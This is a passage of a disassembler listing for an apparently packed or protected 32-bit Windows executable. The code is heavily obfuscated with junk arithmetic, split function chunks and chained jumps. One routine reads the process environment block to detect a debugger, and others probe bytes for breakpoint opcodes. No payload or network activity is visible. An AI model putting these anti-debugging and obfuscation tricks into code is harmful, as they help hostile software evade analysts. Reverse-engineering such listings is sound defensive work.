; ---------------------------------------------------------------------------

loc_452F39:				; CODE XREF: hvvrg7ie:0044D461j
		jge	loc_459456

; =============== S U B	R O U T	I N E =======================================



sub_452F3F	proc near		; CODE XREF: sub_44D2F8:loc_442417p

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00447E16 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450405 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00456454 SIZE 00000010 BYTES

		xchg	ecx, [esp+4+var_4]
		pop	ecx
		xchg	esi, [esp+0]
		mov	eax, esi
		pop	esi
		and	eax, 258547AAh
		xor	eax, 866D44D8h
		jmp	loc_447E16
sub_452F3F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	edx
		push	5589C160h
		pop	edx
		and	edx, 0C4DD7DCCh
		jmp	loc_43EADC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_249. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455E0D

loc_452F6D:				; CODE XREF: sub_455E0D+458Fj
		jmp	loc_450C52
; END OF FUNCTION CHUNK	FOR sub_455E0D
; ---------------------------------------------------------------------------

loc_452F72:				; CODE XREF: hvvrg7ie:0044E13Cj
		add	eax, 36F718C9h

; =============== S U B	R O U T	I N E =======================================



sub_452F78	proc near		; CODE XREF: sub_447D56-1A27p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043A6FB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043CC82 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00442208 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00446766 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D12B SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044E507 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045131B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455487 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045B340 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_458D98
		or	eax, eax
		jnz	loc_442208
		jmp	loc_45B340
sub_452F78	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_452F92:				; CODE XREF: hvvrg7ie:004553B2j
		jl	loc_447639
		sub	ecx, 85CBFA6Ch
		jmp	loc_449A9A
; ---------------------------------------------------------------------------
		cmp	edi, 86FA0FACh
		jmp	loc_4517C7
; ---------------------------------------------------------------------------

loc_452FAE:				; CODE XREF: hvvrg7ie:00459621j
		jns	loc_45817F

; =============== S U B	R O U T	I N E =======================================



sub_452FB4	proc near		; CODE XREF: sub_458F33:loc_457696p
		xchg	esi, [esp+0]
		pop	esi
		pop	ecx
		push	offset sub_443A70
		jmp	nullsub_165
sub_452FB4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B13

loc_452FC3:				; CODE XREF: sub_455B13+Cj
		test	eax, eax
		jle	loc_4506F0
		jmp	loc_4523BA
; END OF FUNCTION CHUNK	FOR sub_455B13
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_452FD0:				; CODE XREF: sub_442FD1:loc_439FC1j
					; sub_4451F7+Ej
		mov	eax, large fs:30h
		add	eax, 2
		mov	eax, [eax]
		or	al, al
		jz	loc_43B509
		jmp	loc_439AD9
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------

loc_452FE9:				; CODE XREF: hvvrg7ie:loc_447D5Ej
					; hvvrg7ie:0045A6C4j
		add	edx, 40F2FBh
		xchg	edx, [esp]
		jmp	loc_43F9AB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_452FF7:				; CODE XREF: sub_43D285+9AEBj
		and	ecx, edi
		add	edi, eax
		jmp	loc_4445DE
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
		push	ecx
		mov	ecx, [esp+10h]
		mov	dword ptr [ecx], 10001h

loc_45300B:				; CODE XREF: hvvrg7ie:0044DFFAj
		lea	eax, loc_444A2E
		push	edx
		mov	edx, edi
		xchg	edx, [esp]
		jmp	loc_44FA43
; ---------------------------------------------------------------------------

loc_45301C:				; DATA XREF: hvvrg7ie:loc_44A7CFo
		sub	eax, edi
		pop	edi
		rol	eax, 0Dh
		jmp	loc_456EEE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4495B9

loc_453027:				; CODE XREF: sub_4495B9j
		mov	eax, ds:dword_447E48
		push	offset sub_441E23

loc_453032:				; CODE XREF: hvvrg7ie:0043F81Bj
		jmp	loc_451DCB
; END OF FUNCTION CHUNK	FOR sub_4495B9
; ---------------------------------------------------------------------------

loc_453037:				; CODE XREF: hvvrg7ie:00448840j
		ror	eax, 0Eh
		push	ebx
		mov	ebx, esi
		xchg	ebx, [esp]
		jmp	loc_450B8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C811

loc_453045:				; CODE XREF: sub_43C811:loc_43B3B4j
		mov	edi, ecx
		xchg	edi, [esp+8+var_8]
		push	edi
		push	7B86F806h
		pop	edi
		and	edi, ds:4000F8h
		jmp	loc_44952E
; END OF FUNCTION CHUNK	FOR sub_43C811
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_45305C:				; CODE XREF: sub_44059F+46C0j
		call	sub_4424A6
		mov	[ebp-10h], eax
		cmp	dword ptr [ebp-10h], 0
		jz	loc_43FA8C
		jmp	loc_45B127
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------
		rol	edi, 0Eh
		pushf
		jmp	sub_43B6A5
; ---------------------------------------------------------------------------

loc_45307C:				; CODE XREF: hvvrg7ie:0043ED0Dj
		cdq
		not	ecx
		jmp	loc_458BF9
; ---------------------------------------------------------------------------
		jbe	loc_445617
		jmp	loc_448C44
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_453090:				; CODE XREF: sub_45889B-CB72j
		jmp	loc_443B6C
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_453095:				; CODE XREF: sub_43D285:loc_4463F4j
		jnz	loc_44CDFC
		jmp	loc_446334
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B7CB

loc_4530A0:				; CODE XREF: sub_44B7CB-2DBj
		jnp	loc_459091
		jmp	loc_448DEE
; END OF FUNCTION CHUNK	FOR sub_44B7CB
; ---------------------------------------------------------------------------

loc_4530AB:				; CODE XREF: hvvrg7ie:0043DF50j
					; hvvrg7ie:0044C96Fj
		rol	edx, 0Bh
		add	edx, 0AD55F24Ah
		add	edx, ebp
		add	edx, 5AEA45D4h
		jmp	loc_44087C
; ---------------------------------------------------------------------------

loc_4530C1:				; CODE XREF: hvvrg7ie:00442059j
		popf
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_4530C2:				; CODE XREF: sub_44059F:loc_4419E6j
		xor	eax, 20A34360h
		add	eax, ebp

loc_4530CA:				; CODE XREF: hvvrg7ie:004451BEj
		add	eax, 0BCD64C66h
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_441F8D
		jmp	loc_4527CD
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------
		push	0A790DEA4h
		pop	edx
		or	edx, 0E521D361h
		jnz	loc_459545
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_4530F2:				; CODE XREF: sub_44191F+F4CAj
		jmp	loc_43F179
; END OF FUNCTION CHUNK	FOR sub_44191F
; ---------------------------------------------------------------------------
		or	ecx, 0C9808E8Dh
		jmp	loc_459537
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_453102:				; CODE XREF: sub_4465A6:loc_448659j
		jz	loc_4547B9

loc_453108:				; CODE XREF: hvvrg7ie:004573CDj
		jmp	loc_455FDA
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4462F9

loc_45310D:				; CODE XREF: sub_4462F9+Ej
		jmp	loc_459902
; END OF FUNCTION CHUNK	FOR sub_4462F9
; ---------------------------------------------------------------------------
		sbb	edx, ecx
		jmp	loc_443AC1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_453119:				; CODE XREF: sub_44D47A:loc_43EB6Cj
					; sub_43F227+F9AAj
		jz	loc_4529AB
		jmp	loc_44EA7C
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4525FC

loc_453124:				; CODE XREF: sub_4525FC-1795Fj
		pop	eax
		rol	eax, 15h
		and	eax, 86847574h
		xor	eax, 0B4BF15A7h
		add	eax, ebp
		add	eax, 0CB40DA79h
		push	offset sub_451697
		jmp	nullsub_169
; END OF FUNCTION CHUNK	FOR sub_4525FC
; ---------------------------------------------------------------------------

loc_453146:				; CODE XREF: hvvrg7ie:loc_44B066j
		or	edi, 75F6457Bh
		popf
		jmp	loc_43A396
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452AA0

loc_453152:				; CODE XREF: sub_452AA0+Bj
		xchg	ebx, [esp+0]
		mov	ecx, ebx
		pop	ebx
		mov	eax, ds:dword_459D6C
		or	eax, eax
		jnz	loc_452DDD
		jmp	loc_43B2D9
; END OF FUNCTION CHUNK	FOR sub_452AA0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_45316B:				; CODE XREF: sub_440C05-511Dj
		pop	edx
		and	eax, 0DC735322h
		add	eax, 935624DEh
		add	eax, ebp
		add	eax, 1056981Ch
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jmp	loc_44D871
; END OF FUNCTION CHUNK	FOR sub_440C05
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_209. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_45318B:				; CODE XREF: sub_450434:loc_43D034j
					; hvvrg7ie:0044B499j
		jnz	loc_45AA14

loc_453191:				; CODE XREF: sub_44D98D+53E3j
					; sub_43CEB6+1C393j
		jmp	loc_44A337
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_453196:				; CODE XREF: sub_44388C+5FACj
		jmp	loc_44894F
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------
		jo	loc_43B17E
		add	ebp, ecx
		or	ecx, 9A19B9C3h
		popf
		jmp	loc_44B5BE
; ---------------------------------------------------------------------------

loc_4531AF:				; CODE XREF: hvvrg7ie:0044BDD5j
		sbb	eax, ebx

; =============== S U B	R O U T	I N E =======================================



sub_4531B1	proc near		; CODE XREF: sub_4405D7+2C08p

; FUNCTION CHUNK AT 0043EC91 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044941B SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	edx, eax
		push	edx
		push	0DE7042EFh
		pop	edx
		rol	edx, 10h
		jmp	loc_44941B
sub_4531B1	endp

; ---------------------------------------------------------------------------

loc_4531C6:				; CODE XREF: hvvrg7ie:loc_450914j
		pop	ebx
		sub	ebx, 72395B09h
		add	ebx, 0CAAACFF3h
		rol	ebx, 17h
		jmp	loc_444CF9
; ---------------------------------------------------------------------------

loc_4531DB:				; CODE XREF: hvvrg7ie:0043EB21j
		jnz	loc_43FB4F
		jmp	loc_44EA71
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456423

loc_4531E6:				; CODE XREF: sub_456423+7j
		mov	ebp, esp
		add	esp, 0FFFFFFECh
		cmp	ds:byte_451094,	0
		jnz	loc_454F9C
		lea	edx, [ebp-14h]
		jmp	loc_43D003
; END OF FUNCTION CHUNK	FOR sub_456423
; ---------------------------------------------------------------------------

locret_453200:				; CODE XREF: hvvrg7ie:0044480Ej
		retn
; ---------------------------------------------------------------------------

loc_453201:				; CODE XREF: hvvrg7ie:loc_445309j
					; hvvrg7ie:004561A5j
		jmp	loc_43BD24
; ---------------------------------------------------------------------------

loc_453206:				; CODE XREF: hvvrg7ie:0043D2CDj
		jmp	loc_4565D2
; ---------------------------------------------------------------------------

locret_45320B:				; CODE XREF: hvvrg7ie:loc_4557B4j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45202B

loc_45320C:				; CODE XREF: sub_45202B-B329j
		jmp	loc_44382C
; END OF FUNCTION CHUNK	FOR sub_45202B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_544. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451D60

loc_453212:				; CODE XREF: sub_451D60-E198j
		xor	esi, 0FC06F54Ch
		and	esi, 8D2DCA89h
		xor	esi, 5A32DE2Dh
		add	esi, 2530D322h
		xchg	esi, [esp+4+var_4]
		jmp	loc_4395C7
; END OF FUNCTION CHUNK	FOR sub_451D60
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4413A5

loc_453232:				; CODE XREF: hvvrg7ie:0043F811j
					; sub_4413A5:loc_442A5Cj ...
		add	ecx, ds:4000FAh
		and	ecx, 6D84796Bh
		jnz	loc_4410D1

loc_453244:				; CODE XREF: sub_44980B-66C2j
		jmp	loc_450836
; END OF FUNCTION CHUNK	FOR sub_4413A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_453249:				; CODE XREF: sub_43F227-2117j
		jmp	loc_447AAE
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441FE4

loc_45324E:				; CODE XREF: sub_441FE4-4F4Fj
		jmp	loc_43E1A8
; END OF FUNCTION CHUNK	FOR sub_441FE4
; ---------------------------------------------------------------------------
		mov	[ecx], eax

loc_453255:				; CODE XREF: hvvrg7ie:0043915Dj
		jmp	loc_4410C5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455087

loc_45325A:				; CODE XREF: sub_455087-1304Aj
		or	edx, 0B61021EBh

loc_453260:				; CODE XREF: sub_455087:loc_4475FBj
		push	4F30E49Bh
		pop	eax
		rol	eax, 10h
		jmp	loc_458B81
; END OF FUNCTION CHUNK	FOR sub_455087
; ---------------------------------------------------------------------------

loc_45326E:				; CODE XREF: hvvrg7ie:0044E945j
		add	ecx, 0BE450E77h
		xchg	ecx, [esp]
		jmp	nullsub_539
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44955C

loc_45327C:				; CODE XREF: sub_44955C:loc_440840j
		jl	loc_43E166
		pushf
		test	ebx, 83C8762Dh
		jmp	loc_43B25C
; END OF FUNCTION CHUNK	FOR sub_44955C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_45328E:				; CODE XREF: sub_440C05+14A70j
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_440C05
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4484E1

loc_453290:				; CODE XREF: sub_4484E1+E85Bj
		jmp	loc_446181
; END OF FUNCTION CHUNK	FOR sub_4484E1
; ---------------------------------------------------------------------------

loc_453295:				; CODE XREF: hvvrg7ie:0044A4F1j
		jmp	loc_4451E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443AE2

loc_45329A:				; CODE XREF: sub_443AE2+1j
		jmp	loc_44F577
; END OF FUNCTION CHUNK	FOR sub_443AE2

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_45329F	proc near		; CODE XREF: sub_448FC5:loc_4392E8j
					; hvvrg7ie:00439331p ...
		push	ecx
		mov	ecx, ebp
		xchg	ecx, [esp+0]
		mov	ebp, esp
		push	offset sub_449232
		jmp	nullsub_171
sub_45329F	endp

; ---------------------------------------------------------------------------
		xor	ecx, 7D5A5AFBh

loc_4532B7:				; CODE XREF: hvvrg7ie:loc_439D3Bj
		jnb	loc_4421D2
		jmp	sub_451429
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_4532C2:				; CODE XREF: sub_44059F+14517j
		adc	edx, 0BCFA9E10h

loc_4532C8:				; CODE XREF: sub_44059F:loc_441499j
		push	0A688139Dh
		pop	eax
		add	eax, 0B9644366h
		jns	loc_45B01B
; END OF FUNCTION CHUNK	FOR sub_44059F
; START	OF FUNCTION CHUNK FOR sub_451176

loc_4532DA:				; CODE XREF: sub_451176+18j
		jmp	loc_43FB7F
; END OF FUNCTION CHUNK	FOR sub_451176
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456FE7

loc_4532DF:				; CODE XREF: sub_456FE7-1D437j
		mov	eax, [ebp-1Ch]
		and	eax, 0FFh
		mov	eax, ds:dword_453458[eax*4]
; END OF FUNCTION CHUNK	FOR sub_456FE7
; START	OF FUNCTION CHUNK FOR sub_439873

loc_4532EE:				; CODE XREF: sub_439873:loc_441C18j
		call	sub_43A0EC

loc_4532F3:				; CODE XREF: sub_455B7D-6EDFj
		jmp	loc_455448
; END OF FUNCTION CHUNK	FOR sub_439873
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446EC2

loc_4532F8:				; CODE XREF: sub_446EC2:loc_4529FDj
		and	ebx, ebp
		ror	edx, 1Eh
		mov	[edx], ebp
		jmp	loc_43C897
; END OF FUNCTION CHUNK	FOR sub_446EC2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BFF5

loc_453304:				; CODE XREF: sub_44BFF5:loc_43FC48j
					; sub_44BFF5+7AC4j
		push	1FAF3F0Eh
		pop	eax
		rol	eax, 5
		xor	eax, 106EAAEh
		jmp	loc_43F024
; END OF FUNCTION CHUNK	FOR sub_44BFF5
; ---------------------------------------------------------------------------
		jmp	ds:off_41D038
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AB9D

loc_45331E:				; CODE XREF: sub_45AB9D-3DC4j
		jmp	loc_45138A
; END OF FUNCTION CHUNK	FOR sub_45AB9D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443452

loc_453323:				; CODE XREF: sub_443452+E58Cj
		jmp	loc_456B85
; END OF FUNCTION CHUNK	FOR sub_443452
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A2CE

loc_453328:				; CODE XREF: sub_439D7F+Fj
					; sub_45A2CE:loc_43BA93j ...
		jno	loc_439D93
		pop	edx
		mov	eax, [esp+0]
		push	ecx
		jmp	loc_457F60
; END OF FUNCTION CHUNK	FOR sub_45A2CE
; ---------------------------------------------------------------------------
		mov	edx, 0BFA1F16Bh
		jmp	sub_44D671
; ---------------------------------------------------------------------------

locret_453342:				; CODE XREF: hvvrg7ie:loc_443F85j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408AE

loc_453343:				; CODE XREF: sub_4408AE:loc_453F69j
		push	edx
		call	sub_4525FC
		mov	eax, 205AA81Dh
		push	edx
		push	44DEE4A8h
		pop	edx
		and	edx, 0C3778E81h
		jmp	loc_44E01E
; END OF FUNCTION CHUNK	FOR sub_4408AE
; ---------------------------------------------------------------------------

loc_453360:				; CODE XREF: hvvrg7ie:0044688Fj
		and	ecx, 71C8E59h
		pushf
		cdq

loc_453368:				; CODE XREF: hvvrg7ie:loc_44687Ej
		rol	eax, 0Bh
		cmp	eax, 84913E26h
		jmp	loc_4479D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4421DE

loc_453376:				; CODE XREF: sub_4421DE+19049j
		sub	ebx, ebp

loc_453378:				; CODE XREF: sub_4421DE:loc_44C0E3j
		call	sub_43FF39

loc_45337D:				; CODE XREF: sub_4480B3+9476j
		jmp	nullsub_527
; END OF FUNCTION CHUNK	FOR sub_4421DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DB4C

loc_453382:				; CODE XREF: sub_43DB4C+1C24Aj
		not	ebp
		jmp	loc_459555
; END OF FUNCTION CHUNK	FOR sub_43DB4C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_154. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_45338A:				; CODE XREF: sub_45889B-DEE2j
		pop	esi
		and	esi, 0BDC0832Eh
		or	esi, ds:4000F0h
		add	esi, 5659F58Fh
		xchg	esi, [esp-4+arg_0]
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4439E7

loc_4533A5:				; CODE XREF: sub_4439E7:loc_453C63j
		call	sub_44DE0A
		mov	edx, 0B9726E5Ah
		call	sub_446A16
		push	eax
		ror	eax, 10h
		mov	ds:dword_45A8AC, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_4439E7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_4533BF:				; CODE XREF: sub_440643:loc_451FEAj
		jl	loc_43F0DE

loc_4533C5:				; CODE XREF: sub_447331-CA0Ej
		jmp	loc_458621
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------

loc_4533CA:				; CODE XREF: hvvrg7ie:loc_455A8Dj
		mov	ecx, [edi]
		mov	eax, 166BC5F0h
		rol	edx, 16h
		sbb	esi, ebx
		jmp	loc_43F0DC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_4533DB:				; CODE XREF: sub_445CCD+BAC6j
		jo	loc_443F25
		or	edi, 7DC3AE2Dh
		jmp	loc_450A47
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------

loc_4533EC:				; CODE XREF: hvvrg7ie:0044C2D1j
		jns	loc_459826

; =============== S U B	R O U T	I N E =======================================



sub_4533F2	proc near		; CODE XREF: hvvrg7ie:00454DF1p

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043AFAC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004401B5 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00440C00 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004420F4 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044DEA1 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044E655 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00453F0B SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045B49A SIZE 0000000C BYTES

		xchg	eax, [esp+4+var_4]
		pop	eax
		pop	edi
		ror	eax, 18h
		jmp	loc_44DEA1
sub_4533F2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452265

loc_453400:				; CODE XREF: sub_452265+Ej
		jmp	loc_446D75
; END OF FUNCTION CHUNK	FOR sub_452265

; =============== S U B	R O U T	I N E =======================================



sub_453405	proc near		; CODE XREF: sub_44F4D4-14229p
					; sub_452488+7p

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C457 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043C620 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043CC34 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043CDA6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D842 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 004401F9 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 004415A9 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00441B36 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00442BC6 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00443C98 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00444B95 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044591E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445A4E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044A60E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044CF9F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D102 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D8B6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DFE2 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044EB9A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044FA37 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00450253 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00453DE5 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045587E SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00455EF9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458CA8 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00459082 SIZE 0000000A BYTES

		jns	loc_43C457
		push	ebp
		mov	ebp, esp
		push	esi
		mov	esi, ecx
		xchg	esi, [esp+8+var_8]
		jmp	loc_44A60E
sub_453405	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44370F

loc_453419:				; CODE XREF: sub_44370F:loc_440C3Fj
		popf
		shl	esi, 5
		jmp	loc_455A1C
; END OF FUNCTION CHUNK	FOR sub_44370F

; =============== S U B	R O U T	I N E =======================================



sub_453422	proc near		; DATA XREF: sub_4470A9+8DC1o

; FUNCTION CHUNK AT 0043BB00 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043DC55 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00440250 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443725 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444C44 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044529C SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00447306 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00447DDF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447E5C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044929C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044A69E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CB85 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FEFD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004527BB SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00459732 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045B3E3 SIZE 0000001C BYTES

		xor	edx, ebp
		rol	edx, 5
		add	edx, esp
		rol	edx, 5
		mov	[ebp-4], edx
		jmp	loc_44CB85
sub_453422	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_453434:				; CODE XREF: sub_43F227+10702j
		xor	edi, eax
		mov	[eax], edi

loc_453438:				; CODE XREF: sub_43F227:loc_4423FAj
		push	0CA94DD42h
		pop	eax
		and	eax, 205541F4h

loc_453444:				; CODE XREF: sub_454099+563Cj
		or	eax, 0CC2755EFh
		add	eax, 858068BCh
		jmp	loc_43A34B
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
		db 11h,	0D2h, 8Dh
dword_453458	dd 4 dup(2), 1Ch dup(1), 5 dup(2), 1, 2, 19h dup(1), 10h dup(402h)
					; DATA XREF: sub_456FE7-3D00r
		dd 10h dup(1), 0Bh dup(2), 3 dup(1), 2 dup(2), 1, 3 dup(0C2h)
		dd 3 dup(2), 7 dup(1), 2 dup(2), 10h dup(0E00h), 10h dup(402h)
		dd 3 dup(1), 2,	1C2h, 3	dup(2),	3 dup(1), 2, 1C2h, 0Bh dup(2)
		dd 2 dup(1), 1C2h, 7 dup(2), 5 dup(1), 2, 9 dup(1), 3 dup(2)
		dd 1, 2, 2 dup(1), 2 dup(2), 1,	3 dup(2), 1, 2,	1, 2 dup(2)
		dd 2 dup(1), 2,	2 dup(1), 2 dup(2), 1, 3 dup(2), 1, 2
		dd 1, 3	dup(2),	1, 2, 2	dup(1),	3 dup(2), 1, 3 dup(2)
		dd 1, 0FFDD08E9h
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4508B6

loc_45385D:				; CODE XREF: sub_4508B6+Bj
		jmp	loc_448CD8
; END OF FUNCTION CHUNK	FOR sub_4508B6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448A18

loc_453862:				; CODE XREF: sub_448A18+Ej
		jmp	loc_44831B
; END OF FUNCTION CHUNK	FOR sub_448A18
; ---------------------------------------------------------------------------

loc_453867:				; CODE XREF: hvvrg7ie:0043EAECj
		jmp	loc_446789
; ---------------------------------------------------------------------------
dword_45386C	dd 77EB36A5h		; DATA XREF: sub_44E0C0:loc_44F6A0w
					; hvvrg7ie:0045071Ew
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E7F3

loc_453870:				; CODE XREF: sub_43E7F3+Ej
		jmp	loc_445878
; END OF FUNCTION CHUNK	FOR sub_43E7F3
; ---------------------------------------------------------------------------
		db 0C1h, 55h, 0E3h
